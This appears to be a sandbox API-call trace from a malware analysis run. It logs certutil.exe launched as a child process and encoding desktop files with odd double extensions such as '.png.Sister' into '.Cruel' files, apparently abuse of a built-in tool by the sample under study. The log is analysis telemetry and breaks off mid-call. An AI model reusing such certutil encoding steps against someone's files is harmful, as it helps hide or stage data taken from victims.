GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0249.830] GetACP () returned 0x4e4 [0249.830] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0249.830] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1d633b4bee0 [0249.830] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1d633b4bee0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0249.830] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1d633b4e6d0 [0249.830] _vsnwprintf (in: _Buffer=0x1d633b4e6d0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x947fabf498 | out: _Buffer="10.0.15063.447 retail") returned 21 [0249.830] LocalFree (hMem=0x1d633b4bee0) returned 0x0 [0249.830] LocalFree (hMem=0x0) returned 0x0 [0249.830] GetACP () returned 0x4e4 [0249.830] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0249.830] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1d633b4b9e0 [0249.830] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1d633b4b9e0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0249.830] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1d633b4e8d0 [0249.830] _vsnwprintf (in: _Buffer=0x1d633b4e8d0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x947fabf4c8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0249.830] LocalFree (hMem=0x1d633b4b9e0) returned 0x0 [0249.830] LocalFree (hMem=0x1d633b4e810) returned 0x0 [0249.830] LocalFree (hMem=0x1d633b4e6d0) returned 0x0 [0249.830] LocalFree (hMem=0x1d633b4e8d0) returned 0x0 [0249.831] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0249.831] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0249.831] GetStockObject (i=0) returned 0x900010 [0249.831] RegisterClassW (lpWndClass=0x947fabf5f0) returned 0xc1a2 [0249.831] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x2502be [0249.862] NtdllDefWindowProc_W () returned 0x0 [0249.862] NtdllDefWindowProc_W () returned 0x1 [0249.867] NtdllDefWindowProc_W () returned 0x0 [0249.875] UpdateWindow (hWnd=0x2502be) returned 1 [0249.875] PostMessageW (hWnd=0x2502be, Msg=0x400, wParam=0x0, lParam=0x1d633b3217e) returned 1 [0249.875] GetMessageW (in: lpMsg=0x947fabf640, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x947fabf640) returned 1 [0249.875] TranslateMessage (lpMsg=0x947fabf640) returned 0 [0249.875] DispatchMessageW (lpMsg=0x947fabf640) returned 0x0 [0249.875] NtdllDefWindowProc_W () returned 0x0 [0249.876] GetMessageW (in: lpMsg=0x947fabf640, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x947fabf640) returned 1 [0249.876] TranslateMessage (lpMsg=0x947fabf640) returned 0 [0249.876] DispatchMessageW (lpMsg=0x947fabf640) returned 0x0 [0249.876] LocalAlloc (uFlags=0x0, uBytes=0x8e) returned 0x1d633b40820 [0249.876] LocalAlloc (uFlags=0x0, uBytes=0x9a) returned 0x1d633b34440 [0249.876] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0249.876] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0249.876] SetLastError (dwErrCode=0x80070716) [0249.876] _vsnwprintf (in: _Buffer=0x947fabf048, _BufferCount=0xb, _Format="%d", _ArgList=0x947fabf038 | out: _Buffer="465") returned 3 [0249.876] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x947fabee00, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0249.876] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1d633b3c070 [0249.876] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0249.876] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0249.876] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x947fabede0, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0249.876] GetLastError () returned 0xcb [0249.877] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0249.877] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0249.877] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0249.877] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0249.877] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0249.877] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0249.877] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0249.877] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0249.877] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0249.877] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0249.877] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0249.877] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0249.877] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0249.877] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0249.877] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0249.877] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0249.877] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0249.877] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0249.877] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0249.877] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0249.877] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0249.877] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x947fabeaa8 | out: phkResult=0x947fabeaa8*=0x23c) returned 0x0 [0249.877] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x1d633b395c0 [0249.878] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x947fabf018, lpData=0x947fabf048, lpcbData=0x947fabf010*=0x4 | out: lpType=0x947fabf018*=0x0, lpData=0x947fabf048*=0x0, lpcbData=0x947fabf010*=0x4) returned 0x2 [0249.878] LocalFree (hMem=0x1d633b395c0) returned 0x0 [0249.878] RegCloseKey (hKey=0x23c) returned 0x0 [0249.878] LocalFree (hMem=0x0) returned 0x0 [0249.878] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x1d633b5d660 [0249.890] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0249.890] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0249.891] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0249.891] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0249.891] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0249.891] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0249.891] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0249.891] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0249.891] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0249.891] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0249.891] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0249.891] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0249.891] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0249.891] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0249.891] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0249.891] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0249.891] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x1d633b62550 [0249.891] GetComputerNameW (in: lpBuffer=0x1d633b62550, nSize=0x947fabf010 | out: lpBuffer="NQDPDE", nSize=0x947fabf010) returned 1 [0249.892] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x947fabefe0 | out: lpBuffer=0x0, nSize=0x947fabefe0) returned 0 [0249.892] GetLastError () returned 0xea [0249.892] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1d633b4bd60 [0249.892] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x1d633b4bd60, nSize=0x947fabefe0 | out: lpBuffer="NQdPdE", nSize=0x947fabefe0) returned 1 [0249.892] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0249.896] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x1d633b627a0, cbCertEncoded=0x11c9b) returned 0x0 [0249.901] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x1d633b627a0, cbCrlEncoded=0x11c9b) returned 0x0 [0249.903] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x1d633b627a0, cbEncoded=0x11c9b, dwFlags=0x8000, pDecodePara=0x947fabeec0, pvStructInfo=0x947fabef50, pcbStructInfo=0x947fabef44 | out: pvStructInfo=0x947fabef50, pcbStructInfo=0x947fabef44) returned 0 [0249.903] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x1d633b627a0, cbEncoded=0x11c9b, dwFlags=0x8000, pDecodePara=0x947fabeec0, pvStructInfo=0x947fabef50, pcbStructInfo=0x947fabef44 | out: pvStructInfo=0x947fabef50, pcbStructInfo=0x947fabef44) returned 0 [0249.904] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x1d633b627a0, cbEncoded=0x11c9b, dwFlags=0x8000, pDecodePara=0x947fabeec0, pvStructInfo=0x947fabef50, pcbStructInfo=0x947fabef44 | out: pvStructInfo=0x947fabef50, pcbStructInfo=0x947fabef44) returned 0 [0249.904] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x1d633b45b30 [0249.914] CryptMsgUpdate (hCryptMsg=0x1d633b45b30, pbData=0x1d633b627a0, cbData=0x11c9b, fFinal=1) returned 0 [0249.914] GetLastError () returned 0x8009310b [0249.914] CryptMsgClose (hCryptMsg=0x1d633b45b30) returned 1 [0249.914] GetFileAttributesExW (in: lpFileName="rcZz1_vwUIy4k7qcs3.mp3.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\rczz1_vwuiy4k7qcs3.mp3.sister"), fInfoLevelId=0x0, lpFileInformation=0x947fabef70 | out: lpFileInformation=0x947fabef70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3635b510, ftCreationTime.dwHighDateTime=0x1d5e33c, ftLastAccessTime.dwLowDateTime=0x6d3ba1a0, ftLastAccessTime.dwHighDateTime=0x1d5e260, ftLastWriteTime.dwLowDateTime=0x6d3ba1a0, ftLastWriteTime.dwHighDateTime=0x1d5e260, nFileSizeHigh=0x0, nFileSizeLow=0x11c9b)) returned 1 [0249.914] _vsnwprintf (in: _Buffer=0x947fabef78, _BufferCount=0xb, _Format="%d", _ArgList=0x947fabef68 | out: _Buffer="359") returned 3 [0249.915] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x947fabed30, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0249.915] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1d633b62310 [0249.915] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0249.915] _vsnwprintf (in: _Buffer=0x947fabdf60, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x947fabefb8 | out: _Buffer="Input Length = 72859") returned 20 [0249.915] GetFileType (hFile=0x50) returned 0x2 [0249.915] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x947fabdf60*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x947fabdf14, lpReserved=0x0 | out: lpBuffer=0x947fabdf60*, lpNumberOfCharsWritten=0x947fabdf14*=0x14) returned 1 [0249.916] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0249.916] _vsnwprintf (in: _Buffer=0x947fabdf60, _BufferCount=0x1ff, _Format="\n", _ArgList=0x947fabefb8 | out: _Buffer="\n") returned 1 [0249.916] GetFileType (hFile=0x50) returned 0x2 [0249.917] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x947fabdf60*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x947fabdf14, lpReserved=0x0 | out: lpBuffer=0x947fabdf60*, lpNumberOfCharsWritten=0x947fabdf14*=0x1) returned 1 [0249.938] GetFileAttributesExW (in: lpFileName="rcZz1_vwUIy4k7qcs3.mp3.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\rczz1_vwuiy4k7qcs3.mp3.cruel"), fInfoLevelId=0x0, lpFileInformation=0x947fabef70 | out: lpFileInformation=0x947fabef70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf9404f6, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xbf9404f6, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xbf9553a6, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x18790)) returned 1 [0249.938] _vsnwprintf (in: _Buffer=0x947fabef78, _BufferCount=0xb, _Format="%d", _ArgList=0x947fabef68 | out: _Buffer="361") returned 3 [0249.938] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x947fabed30, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0249.938] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x1d633b62040 [0249.939] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0249.939] _vsnwprintf (in: _Buffer=0x947fabdf60, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x947fabefb8 | out: _Buffer="Output Length = 100240") returned 22 [0249.939] GetFileType (hFile=0x50) returned 0x2 [0249.939] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x947fabdf60*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x947fabdf14, lpReserved=0x0 | out: lpBuffer=0x947fabdf60*, lpNumberOfCharsWritten=0x947fabdf14*=0x16) returned 1 [0249.943] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0249.943] _vsnwprintf (in: _Buffer=0x947fabdf60, _BufferCount=0x1ff, _Format="\n", _ArgList=0x947fabefb8 | out: _Buffer="\n") returned 1 [0249.943] GetFileType (hFile=0x50) returned 0x2 [0249.943] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x947fabdf60*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x947fabdf14, lpReserved=0x0 | out: lpBuffer=0x947fabdf60*, lpNumberOfCharsWritten=0x947fabdf14*=0x1) returned 1 [0249.948] LocalFree (hMem=0x1d633b627a0) returned 0x0 [0249.948] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0249.948] _vsnwprintf (in: _Buffer=0x947fabefd8, _BufferCount=0xb, _Format="%d", _ArgList=0x947fabefc8 | out: _Buffer="2022") returned 4 [0249.948] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x947fabed90, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0249.949] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x1d633b39120 [0249.949] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0249.949] _vsnwprintf (in: _Buffer=0x947fabdfc0, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x947fabf018 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0249.949] GetFileType (hFile=0x50) returned 0x2 [0249.949] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x947fabdfc0*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x947fabdf74, lpReserved=0x0 | out: lpBuffer=0x947fabdfc0*, lpNumberOfCharsWritten=0x947fabdf74*=0x31) returned 1 [0249.950] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0249.950] _vsnwprintf (in: _Buffer=0x947fabdfc0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x947fabf018 | out: _Buffer="\n") returned 1 [0249.950] GetFileType (hFile=0x50) returned 0x2 [0249.950] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x947fabdfc0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x947fabdf74, lpReserved=0x0 | out: lpBuffer=0x947fabdfc0*, lpNumberOfCharsWritten=0x947fabdf74*=0x1) returned 1 [0249.957] LocalFree (hMem=0x0) returned 0x0 [0249.957] LocalFree (hMem=0x1d633b34440) returned 0x0 [0249.957] LocalFree (hMem=0x1d633b40820) returned 0x0 [0249.957] SetLastError (dwErrCode=0x80070716) [0249.957] _vsnwprintf (in: _Buffer=0x947fabf048, _BufferCount=0xb, _Format="%d", _ArgList=0x947fabf038 | out: _Buffer="511") returned 3 [0249.957] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x947fabee00, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0249.957] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1d633b625b0 [0249.957] PostQuitMessage (nExitCode=0) [0249.957] GetMessageW (in: lpMsg=0x947fabf640, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x947fabf640) returned 0 [0249.957] LocalFree (hMem=0x1d633b4bd60) returned 0x0 [0249.957] LocalFree (hMem=0x1d633b62550) returned 0x0 [0249.957] LocalFree (hMem=0x0) returned 0x0 [0249.958] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0249.958] GetLastError () returned 0x7e [0249.958] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0249.959] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0249.959] DllMain () returned 0x1 [0249.959] LocalFree (hMem=0x1d633b4bb40) returned 0x0 [0249.959] LocalFree (hMem=0x1d633b3c070) returned 0x0 [0249.959] LocalFree (hMem=0x1d633b62310) returned 0x0 [0249.959] LocalFree (hMem=0x1d633b62040) returned 0x0 [0249.959] LocalFree (hMem=0x1d633b39120) returned 0x0 [0249.959] LocalFree (hMem=0x1d633b625b0) returned 0x0 [0249.959] LocalFree (hMem=0x1d633b550d0) returned 0x0 [0249.959] LocalFree (hMem=0x1d633b3bc80) returned 0x0 [0249.959] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0249.959] GetLastError () returned 0x7e [0249.959] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0249.960] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0249.960] DllMain () returned 0x1 [0249.960] exit (_Code=0) Thread: id = 79 os_tid = 0x1224 Thread: id = 80 os_tid = 0x1268 Process: id = "29" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x6255c000" os_pid = "0x126c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"rJUrds91A0r_fz.png.Sister\" \"rJUrds91A0r_fz.png.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 81 os_tid = 0x12cc [0250.478] GetStartupInfoW (in: lpStartupInfo=0xda6499f950 | out: lpStartupInfo=0xda6499f950*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"rJUrds91A0r_fz.png.Sister\" \"rJUrds91A0r_fz.png.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0250.486] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0250.486] __set_app_type (_Type=0x1) [0250.486] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0250.486] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0250.489] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0250.489] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0250.490] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0250.490] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0250.490] WerSetFlags () returned 0x0 [0250.490] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0250.490] __iob_func () returned 0x7ffcea2dea00 [0250.490] _fileno (_File=0x7ffcea2dea30) returned 1 [0250.490] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0250.491] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0250.492] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0250.492] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0250.492] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0250.492] GetConsoleOutputCP () returned 0x1b5 [0250.567] _vsnwprintf (in: _Buffer=0xda6499f8c0, _BufferCount=0xb, _Format=".%d", _ArgList=0xda6499f7e8 | out: _Buffer=".437") returned 4 [0250.567] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0250.567] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0250.567] GetFileType (hFile=0x50) returned 0x2 [0250.567] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0250.568] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0250.568] SetThreadUILanguage (LangId=0x0) returned 0x409 [0250.636] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0250.636] GetCommandLineW () returned="certutil -encode \"rJUrds91A0r_fz.png.Sister\" \"rJUrds91A0r_fz.png.Cruel\"" [0250.636] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1f301f7b8b0 [0250.636] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1f301f6a0c0 [0250.636] LocalFree (hMem=0x1f301f7b8b0) returned 0x0 [0250.636] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1f301f6a120 [0250.637] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x1f301f72350 [0250.637] LocalFree (hMem=0x1f301f6a120) returned 0x0 [0250.637] LocalFree (hMem=0x1f301f6a0c0) returned 0x0 [0250.637] LocalFree (hMem=0x0) returned 0x0 [0250.637] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0250.637] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0250.637] GetCommandLineW () returned="certutil -encode \"rJUrds91A0r_fz.png.Sister\" \"rJUrds91A0r_fz.png.Cruel\"" [0250.637] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1f301f7b450 [0250.638] GetSystemTime (in: lpSystemTime=0xda6499f5b0 | out: lpSystemTime=0xda6499f5b0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0x19, wMilliseconds=0xb1)) [0250.638] SystemTimeToFileTime (in: lpSystemTime=0xda6499f5b0, lpFileTime=0xda6499f5a8 | out: lpFileTime=0xda6499f5a8) returned 1 [0250.638] FileTimeToLocalFileTime (in: lpFileTime=0xda6499f5a8, lpLocalFileTime=0xda6499f570 | out: lpLocalFileTime=0xda6499f570) returned 1 [0250.638] FileTimeToSystemTime (in: lpFileTime=0xda6499f570, lpSystemTime=0xda6499f2e0 | out: lpSystemTime=0xda6499f2e0) returned 1 [0250.638] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xda6499f2e0, lpFormat=0x0, lpDateStr=0xda6499f3f0, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0250.638] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xda6499f2e0, lpFormat=0x0, lpTimeStr=0xda6499f2f0, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0250.638] _vsnwprintf (in: _Buffer=0xda6499f2fe, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xda6499f2c8 | out: _Buffer=" 25.177s") returned 8 [0250.638] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x1f301f7df90 [0250.638] SetLastError (dwErrCode=0x80070716) [0250.638] _vsnwprintf (in: _Buffer=0xda6499f378, _BufferCount=0xb, _Format="%d", _ArgList=0xda6499f368 | out: _Buffer="948") returned 3 [0250.638] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xda6499f130, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0250.638] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x1f301f7b9f0 [0250.638] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x1f301f74780 [0250.638] LocalFree (hMem=0x1f301f7df90) returned 0x0 [0250.639] GetSystemTimeAsFileTime (in: 